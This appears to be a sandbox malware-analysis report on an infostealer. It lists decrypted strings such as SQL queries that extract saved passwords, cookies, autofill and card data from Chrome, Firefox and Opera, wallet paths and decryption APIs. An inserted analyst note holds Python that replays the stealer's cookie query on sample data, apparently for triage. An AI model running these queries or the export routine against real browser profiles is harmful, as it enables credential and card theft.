Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x64
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x64
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x32
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: x32
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProductName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ProductName
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %08lX%04lX%lu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: %08lX%04lX%lu
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Wallets
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Wallets
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: firefox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: firefox
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: opera
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: opera
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: profiles.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: profiles.ini
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local State
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local State
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome-extension_
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: chrome-extension_
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CURRENT
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera GX Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera GX Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera Stable
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: IndexedDB
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: IndexedDB
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sync Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Sync Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Local Extension Settings
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Plugins
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Plugins
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: places.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: places.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: formhistory.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: formhistory.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: cookies.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: cookies.sqlite
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: guid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: guid
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encryptedPassword
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encryptedUsername
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: usernameField
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: formSubmitURL
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: logins.json
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: History
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Web Data
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Login Data
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Card:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Year:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Month:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Name:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: History
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Autofill
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: FALSE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: TRUE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: .txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Network
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: OperaGX
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Password:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Login:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Host:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: profile:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Soft:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\ProgramData\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_Authenticate
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_FreeSlot
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NSS_Shutdown
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NSS_Init
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PATH
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encrypted_key
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_blob
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_bytes
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_close
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_finalize
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_text
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_step
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_open
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmEndSession
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmGetList
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmRegisterResources
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmStartSession
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetModuleFileNameExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PathMatchSpecA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrCmpCW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrStrA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrCmpCA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetCrackUrlA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetReadFile
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HttpOpenRequestA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HttpSendRequestA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetOpenA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetCloseHandle
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetConnectA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetOpenUrlA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ShellExecuteExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SHGetFolderPathA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptUnprotectData
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptBinaryToStringA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegEnumValueA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegCloseKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegOpenKeyExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegEnumKeyExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegQueryValueExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: wsprintfW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CharToOemW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: wsprintfA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CloseWindow
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDesktopWindow
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetWindowRect
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptDestroyKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptSetProperty
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptDecrypt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CoCreateInstance
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CoInitialize
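Analyst note (added example, not part of the sandbox output): the decrypted cookie query above can be replayed against a Chromium-style Cookies database to see exactly what the stealer exports. Two details are worth checking. First, the query's constant 11644480800 is not the true offset between the Chromium epoch (1601-01-01) and the Unix epoch, which is 11644473600; every expiry the stealer writes is therefore 7200 seconds (two hours) early. Second, the surrounding strings TRUE, FALSE and .txt are consistent with a Netscape cookies.txt export, which the code below renders. The table layout and the single cookie row are constructed sample data, not taken from the report; the encrypted_value column is left as a placeholder because decrypting it needs the victim's DPAPI key.

```python
import sqlite3

# Query recovered from the decrypted strings above (copied verbatim, including its constant).
STEALER_COOKIE_QUERY = (
    "SELECT HOST_KEY, is_httponly, path, is_secure, "
    "(expires_utc/1000000)-11644480800, name, encrypted_value from cookies"
)

# Seconds from the Chromium/Windows epoch (1601-01-01 UTC) to the Unix epoch (1970-01-01 UTC).
CHROMIUM_EPOCH_OFFSET = 11_644_473_600
# Constant hard-coded in the recovered query; differs from the true offset by two hours.
STEALER_EPOCH_OFFSET = 11_644_480_800


def build_sample_cookie_db() -> sqlite3.Connection:
    """Constructed stand-in for a Chromium 'Cookies' database (sample row, not from the report).

    Only the columns the recovered query touches are modelled. SQLite matches column names
    case-insensitively, so the query's HOST_KEY resolves to host_key.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cookies (host_key TEXT, name TEXT, path TEXT, expires_utc INTEGER, "
        "is_secure INTEGER, is_httponly INTEGER, encrypted_value BLOB)"
    )
    # Expiry 2025-01-01T00:00:00Z (Unix 1735689600) stored as Chromium time: microseconds since 1601.
    expires_utc = (1_735_689_600 + CHROMIUM_EPOCH_OFFSET) * 1_000_000
    conn.execute(
        "INSERT INTO cookies VALUES (?, ?, ?, ?, ?, ?, ?)",
        (".example.test", "session", "/", expires_utc, 1, 1, b"v10" + b"\x00" * 28),
    )
    conn.commit()
    return conn


def run_stealer_query(conn: sqlite3.Connection) -> list:
    """Execute the recovered query exactly as the stealer does (SQLite '/' on integers truncates)."""
    return conn.execute(STEALER_COOKIE_QUERY).fetchall()


def true_unix_expiry(stealer_expiry: int) -> int:
    """Undo the stealer's constant and apply the correct one to recover the real Unix expiry."""
    return stealer_expiry + STEALER_EPOCH_OFFSET - CHROMIUM_EPOCH_OFFSET


def epoch_skew_seconds() -> int:
    """How far the stealer's expiry timestamps drift from the real ones (positive = too early)."""
    return STEALER_EPOCH_OFFSET - CHROMIUM_EPOCH_OFFSET


def to_netscape_line(row) -> str:
    """Render one query row in Netscape cookies.txt layout.

    encrypted_value is still a DPAPI/AES-GCM blob at this point, so it is written as a
    placeholder rather than as a cookie value.
    """
    host, httponly, path, secure, expires, name, _encrypted_value = row
    domain = ("#HttpOnly_" if httponly else "") + host
    include_subdomains = "TRUE" if host.startswith(".") else "FALSE"
    return "\t".join([domain, include_subdomains, path,
                      "TRUE" if secure else "FALSE", str(expires), name, "<encrypted>"])


def export_cookies(conn: sqlite3.Connection) -> list:
    """Full replay: run the stealer's query and render every row as a cookies.txt line."""
    return [to_netscape_line(row) for row in run_stealer_query(conn)]


if __name__ == "__main__":
    db = build_sample_cookie_db()
    for line in export_cookies(db):
        print(line)
    print("expiry skew introduced by the stealer's constant:", epoch_skew_seconds(), "seconds")
```

When triaging an exfiltrated cookies.txt attributed to this family, add 7200 seconds to the expiry column before comparing it with the victim's browser profile; otherwise sessions look as if they expired earlier than they did.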
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00426275 SysStringLen,CryptProtectData,SysAllocStringByteLen,memset,memcpy,LocalFree, 2_2_00426275
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00426315 SysStringByteLen,CryptUnprotectData,SysAllocStringLen,memset,memcpy,LocalFree, 2_2_00426315
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_004263BD CryptProtectData, 2_2_004263BD
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042642E CryptUnprotectData, 2_2_0042642E
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0F4B CryptDestroyKey,LocalFree, 3_2_275A0F4B
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0F70 CryptDestroyHash, 3_2_275A0F70
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27563F20 CryptDecrypt, 3_2_27563F20
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754DFC0 __time64,__time64,CryptContextAddRef, 3_2_2754DFC0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759DF90 CryptVerifyMessageSignature,CryptVerifyMessageSignature,GetLastError,CryptVerifyMessageSignature, 3_2_2759DF90
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A07A0 CryptDestroyHash,CryptDestroyKey, 3_2_275A07A0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759EEC0 CertDuplicateCertificateContext,_memset,__time64,_memset,CryptSignMessage,GetLastError,CryptSignMessage, 3_2_2759EEC0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A06C0 CryptDuplicateKey,GetLastError,GetLastError,GetLastError,GetLastError,CryptSetKeyParam,CryptCreateHash, 3_2_275A06C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27548680 CryptDecrypt,CryptDecrypt,GetLastError,CryptDecrypt,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_27548680
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753DD40 EncryptWithSessionKey,InterlockedDecrement, 3_2_2753DD40
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0570 CryptSetKeyParam, 3_2_275A0570
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0D00 CryptGetProvParam,CryptGenKey,CryptGetKeyParam,CryptGetKeyParam,CryptDestroyKey,CryptGetKeyParam,CryptGetKeyParam,LocalAlloc,CryptGenRandom,CryptImportKey, 3_2_275A0D00
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754ED20 CryptGetHashParam, 3_2_2754ED20
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275525E0 __time64,__time64,CryptDestroyKey,CryptDestroyKey,CryptCreateHash,_memset,InternetCrackUrlW,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_275525E0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275485B0 CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_275485B0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A05A0 CryptContextAddRef,lstrlenA,lstrlenA, 3_2_275A05A0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27593C50 CryptDestroyHash, 3_2_27593C50
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759F450 CryptDestroyKey,CryptProtectData, 3_2_2759F450
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27538C40 CryptDestroyKey, 3_2_27538C40
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A14C0 _memset,GetVersionExW,GetLastError,GetLastError,GetLastError,GetLastError,CryptImportKey, 3_2_275A14C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754DCF0 CryptDestroyKey,CryptDuplicateKey,CryptDestroyKey,CryptDuplicateKey, 3_2_2754DCF0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A04F0 CryptEncrypt, 3_2_275A04F0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754ECE0 CryptGetHashParam, 3_2_2754ECE0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754DC90 CryptReleaseContext,CryptContextAddRef, 3_2_2754DC90
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754EC80 CryptHashData, 3_2_2754EC80
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754ECB0 CryptSetHashParam, 3_2_2754ECB0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A04B0 CryptEncrypt, 3_2_275A04B0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759F310 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash, 3_2_2759F310
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275533F0 __time64,CryptCreateHash,_memset,InternetCrackUrlW,GetLastError,GetLastError,GetLastError,GetLastError,CryptDestroyHash, 3_2_275533F0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A13E0 GetLastError,GetLastError,GetLastError,CryptDestroyKey,GetLastError, 3_2_275A13E0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27539A70 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 3_2_27539A70
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A1220 CryptGenKey,CryptExportKey,CryptExportKey,CryptExportKey,CryptImportKey,SetLastError,CryptDestroyKey, 3_2_275A1220
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A1AF0 LocalAlloc,__CxxThrowException@8,CryptCreateHash,CryptCreateHash,CryptCreateHash,LocalFree,CryptDestroyKey,CryptDestroyHash, 3_2_275A1AF0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753D140 CryptReleaseContext,LocalFree, 3_2_2753D140
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27579910 CryptReleaseContext,CryptAcquireContextW,CryptReleaseContext, 3_2_27579910
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753E1D0 DecryptWithSessionKey,InterlockedDecrement, 3_2_2753E1D0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A09D0 CryptDuplicateKey,GetLastError,GetLastError,GetLastError,GetLastError,CryptDestroyKey,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,CryptDestroyKey,GetLastError,CryptGenRandom,CryptGetHashParam, 3_2_275A09D0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A2040 __CxxThrowException@8,CryptAcquireContextA,GetLastError,GetLastError,GetLastError,GetLastError,__CxxThrowException@8,InterlockedDecrement,SetEvent,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,GetLastError,_memset,CryptGenRandom,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_275A2040
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753B870 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 3_2_2753B870
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A18D0 InterlockedDecrement,SetEvent,CryptGetProvParam,CryptGenKey,CryptGetKeyParam,CryptDestroyKey,_memset,CryptDestroyKey, 3_2_275A18D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043302D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 9_2_0043302D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00427DC2 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 9_2_00427DC2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00427E41 CryptUnprotectData,LocalAlloc,LocalFree, 9_2_00427E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042AB80 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA, 9_2_0042AB80
Source: oracleSuper.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49916 version: TLS 1.2
Source: oracleSuper.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdb source: oracleSuper.exe
Source: Binary string: wntdll.pdb source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msidcrl40.pdb source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: msidcrl40.pdbL source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171954674.0000000027501000.00000020.00000001.01000000.00000008.sdmp, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: livecall.pdb source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: livecall.pdbl source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdbi source: oracleSuper.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00421443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00421443
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042E016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C039 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042C039
